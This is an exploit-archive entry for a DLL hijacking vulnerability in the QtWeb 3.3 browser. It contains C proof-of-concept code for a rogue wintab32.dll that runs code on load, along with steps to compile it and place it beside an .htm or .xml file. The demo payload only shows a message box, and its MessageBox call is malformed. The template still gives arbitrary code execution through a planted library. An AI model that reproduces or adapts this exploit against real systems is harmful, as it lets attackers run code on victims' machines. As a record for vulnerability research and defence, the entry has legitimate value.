QtWeb DLL hijacking (wintab32.dll) Vulnerability

2010-09-01T00:00:00
ID 1337DAY-ID-13940
Type zdt
Reporter t3rm!n4t0r
Modified 2010-09-01T00:00:00

Description

Exploit for windows platform in category local exploits

                                        
                                            ================================================
QtWeb DLL hijacking (wintab32.dll) Vulnerability
================================================

/*QtWeb Internet browser DLL Hijacking Vulnerability
   
 ~Legion Of Xtremers and Hackers Garage~

  Author: Prashant Uniyal

  Special greets to:"vinnu" and Secfence Team

  Greets to: b0nd,fb1h2s,AnArKi,d4rk357,d4rky

  Version: QtWeb 3.3

  Tested on: Windows XP SP2 En

  Complile and rename to wintab32.dll. Place a .htm, .xml
  file in the same dir with the dll. Execute to check the
  result. 
*/


#include <windows.h>
 
BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
 
    switch (fdwReason)
    {
        case DLL_PROCESS_ATTACH:
        dll_hijack();
        case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
        case DLL_PROCESS_DETACH:
        break;
    }
 
    return TRUE;
}
 
int dll_hijack()
{
    MessageBox(0, "DLL Hijacked!",MB_OK);
}



#  0day.today [2018-02-16]  #